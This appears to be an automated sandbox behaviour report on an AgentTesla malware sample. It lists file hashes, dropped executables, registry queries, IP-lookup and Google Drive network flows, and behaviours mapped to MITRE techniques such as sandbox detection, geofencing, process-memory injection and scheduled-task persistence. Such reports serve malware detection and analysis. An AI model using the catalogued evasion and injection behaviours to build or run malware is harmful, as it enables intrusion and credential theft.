agenttesla | 3f3aa60c75f596017405c60649f8c05a0fc6490110b655b2cb8a75d5c0b47d87

pid	Process
8448	chrome.exe
2436	chrome.exe
1072	chrome.exe
3100	chrome.exe
5648	chrome.exe
7208	chrome.exe
7664	chrome.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe

Executes dropped EXE 22 IoCs

pid	Process
3980	e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe
3984	e6a522d6be11c443fb8c6dfa2e021580fdf71e431fdf0faa411a0f8c56f1fd1b.exe
5532	d9f20fbf64170d65d1a1f2fd66a997913cab8ddb1389df8b1fd1e7ae0f1d0b5b.exe
3912	d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe
5504	cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe
5928	c40b21462fa3c5ebbed41befc33078f7453e4ed5e2594a815103c1efe70d6327.exe
2940	c9ff72b5be41b4298e4d202ec333d6e9cf80589f4112685e5040fcadd79b9605.exe
6620	ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
7532	look2.exe
8148	HD_ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
7540	164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.exe
7488	91ce11dba631a9613d7c96409db89bf0cc358eff124632ad56f25fd6b372b070.exe
4852	svchcst.exe
7060	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.exe
7020	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp
7732	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.exe
7780	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp
7828	9ff724fb4c48b8da74c98b621cddff271942047617f04443ba3b1ed0b8f70d4d.exe
7612	9b58c3f1628ce800f63dc500f420560fca14609f6e9c8db0013e26adf456b2f9.exe
6604	8b96d4f6ddfcb00b4921f876fea0420b9bab29c3d572da3e95335e978c2f94e5.exe
8400	6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe
4888	d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe

Loads dropped DLL 11 IoCs

pid	Process
7532	look2.exe
7048	svchost.exe
7540	164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.exe
7540	164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.exe
4852	svchcst.exe
7020	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp
7020	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp
7780	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp
7780	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp
8400	6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe
8400	6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
804	6344	msiexec.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
888	drive.google.com
935	drive.google.com
860	drive.google.com
861	drive.google.com

Looks up external IP address via web service 11 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
828	api.ipify.org
837	checkip.dyndns.org
949	reallyfreegeoip.org
974	reallyfreegeoip.org
827	api.ipify.org
886	reallyfreegeoip.org
887	reallyfreegeoip.org
896	reallyfreegeoip.org
900	reallyfreegeoip.org
913	api.ipify.org
931	reallyfreegeoip.org

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\241381078.bat	look2.exe
File opened for modification	C:\Windows\SysWOW64\ini.ini	look2.exe
File created	C:\Windows\SysWOW64\svchcst.exe	svchost.exe
File opened for modification	C:\Windows\SysWOW64\svchcst.exe	svchost.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
6648	tasklist.exe
5156	tasklist.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3912 set thread context of 4888	3912	d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe	204

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Fonts\Ordbogs\adjudantsnorenes.Ext241	6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1248	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 15 IoCs

pid	pid_target	Process	procid_target
9068	6684	WerFault.exe	207
9088	6684	WerFault.exe	207
8544	4888	WerFault.exe	204
4760	4888	WerFault.exe	204
2156	2112	WerFault.exe	210
3016	5404	WerFault.exe	302
1092	7060	WerFault.exe	297
7620	180	WerFault.exe	333
6488	180	WerFault.exe	333
7728	8452	WerFault.exe	253
5224	8424	WerFault.exe	298
2856	7768	WerFault.exe	357
5284	7768	WerFault.exe	357
3584	5924	WerFault.exe	378
5872	5924	WerFault.exe	378

System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e6a522d6be11c443fb8c6dfa2e021580fdf71e431fdf0faa411a0f8c56f1fd1b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d9f20fbf64170d65d1a1f2fd66a997913cab8ddb1389df8b1fd1e7ae0f1d0b5b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchcst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9ff724fb4c48b8da74c98b621cddff271942047617f04443ba3b1ed0b8f70d4d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	91ce11dba631a9613d7c96409db89bf0cc358eff124632ad56f25fd6b372b070.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c40b21462fa3c5ebbed41befc33078f7453e4ed5e2594a815103c1efe70d6327.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c9ff72b5be41b4298e4d202ec333d6e9cf80589f4112685e5040fcadd79b9605.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HD_ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9b58c3f1628ce800f63dc500f420560fca14609f6e9c8db0013e26adf456b2f9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8b96d4f6ddfcb00b4921f876fea0420b9bab29c3d572da3e95335e978c2f94e5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	look2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000453bf937353af4350000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000453bf9370000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900453bf937000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d453bf937000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000453bf93700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
4516	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
1840	TaskKill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133832248612213729"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000_Classes\Local Settings	firefox.exe

NTFS ADS 27 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\1e4761f2536f5087e3908bcbc6e1de3ba2bd51c278cea6f33033af35535ea777.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\8b96d4f6ddfcb00b4921f876fea0420b9bab29c3d572da3e95335e978c2f94e5.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\0bbff62a45fc9776575ed143af2d7db332e2781d7e3de56eb3ff48c25d0c7b46.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\9ff724fb4c48b8da74c98b621cddff271942047617f04443ba3b1ed0b8f70d4d.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\e6a522d6be11c443fb8c6dfa2e021580fdf71e431fdf0faa411a0f8c56f1fd1b.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\4c63a06e30d15865d23980562479389970b5089a612998fc25587cbc0b79b723.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\91ce11dba631a9613d7c96409db89bf0cc358eff124632ad56f25fd6b372b070.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\b7dd573ec8f6a7b8a47a2b54e60c294b1547c48f2b96235f587e99b9dbf32014.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\9b58c3f1628ce800f63dc500f420560fca14609f6e9c8db0013e26adf456b2f9.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\819ad25e1dfd53f40ca7d7d176c2a1abf14b16fd5325936c1390ab3001e26af9.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\d9f20fbf64170d65d1a1f2fd66a997913cab8ddb1389df8b1fd1e7ae0f1d0b5b.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\2b529b5727c675ae8c3c8c5df9916c9b1c192dfe9faf54c5fb367d02b4983755.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\c9ff72b5be41b4298e4d202ec333d6e9cf80589f4112685e5040fcadd79b9605.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\c40b21462fa3c5ebbed41befc33078f7453e4ed5e2594a815103c1efe70d6327.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\070a2f1a6ceb8c81da86490d87b6976b0ddcef9eed60d60cc7768649afec9587.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\205901f209731db929cc89e93d986dd5025aabc25c57ad4e342ba21d175aab96.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\c9ff72b5be41b4298e4d202ec333d6e9cf80589f4112685e5040fcadd79b9605(1).zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\43efe1cc4d6fbb13a9db28eed6d69841059041b7c5f4ff07bb3eaf01b44460fd.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.zip:Zone.Identifier	firefox.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
6268	schtasks.exe
8756	schtasks.exe
4588	schtasks.exe
4092	schtasks.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
640	mspaint.exe
640	mspaint.exe
4892	chrome.exe
4892	chrome.exe
6620	ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
6620	ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
7780	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp
7780	22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp
3980	e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe
3980	e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe
3980	e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe
3980	e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe
3980	e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe
3912	d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe
3912	d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe
3912	d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe
3912	d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe
2940	c9ff72b5be41b4298e4d202ec333d6e9cf80589f4112685e5040fcadd79b9605.exe
2940	c9ff72b5be41b4298e4d202ec333d6e9cf80589f4112685e5040fcadd79b9605.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeDebugPrivilege	696	firefox.exe
Token: SeRestorePrivilege	2592	7zG.exe
Token: 35	2592	7zG.exe
Token: SeSecurityPrivilege	2592	7zG.exe
Token: SeSecurityPrivilege	2592	7zG.exe
Token: SeShutdownPrivilege	4892	chrome.exe
Token: SeCreatePagefilePrivilege	4892	chrome.exe
Token: SeShutdownPrivilege	4892	chrome.exe
Token: SeCreatePagefilePrivilege	4892	chrome.exe
Token: SeShutdownPrivilege	4892	chrome.exe
Token: SeCreatePagefilePrivilege	4892	chrome.exe
Token: SeShutdownPrivilege	4892	chrome.exe
Token: SeCreatePagefilePrivilege	4892	chrome.exe
Token: SeShutdownPrivilege	4892	chrome.exe
Token: SeCreatePagefilePrivilege	4892	chrome.exe
Token: SeShutdownPrivilege	4892	chrome.exe
Token: SeCreatePagefilePrivilege	4892	chrome.exe
Token: SeShutdownPrivilege	4892	chrome.exe
Token: SeCreatePagefilePrivilege	4892	chrome.exe
Token: SeShutdownPrivilege	4892	chrome.exe
Token: SeCreatePagefilePrivilege	4892	chrome.exe
Token: SeShutdownPrivilege	4892	chrome.exe
Token: SeCreatePagefilePrivilege	4892	chrome.exe
Token: SeShutdownPrivilege	4892	chrome.exe
Token: SeCreatePagefilePrivilege	4892	chrome.exe
Token: SeShutdownPrivilege	4892	chrome.exe
Token: SeCreatePagefilePrivilege	4892	chrome.exe
Token: SeShutdownPrivilege	4892	chrome.exe
Token: SeCreatePagefilePrivilege	4892	chrome.exe
Token: SeShutdownPrivilege	4892	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
2592	7zG.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe
4892	chrome.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
640	mspaint.exe
640	mspaint.exe
640	mspaint.exe
640	mspaint.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe
696	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2292 wrote to memory of 696	2292	firefox.exe	94
PID 2292 wrote to memory of 696	2292	firefox.exe	94
PID 2292 wrote to memory of 696	2292	firefox.exe	94
PID 2292 wrote to memory of 696	2292	firefox.exe	94
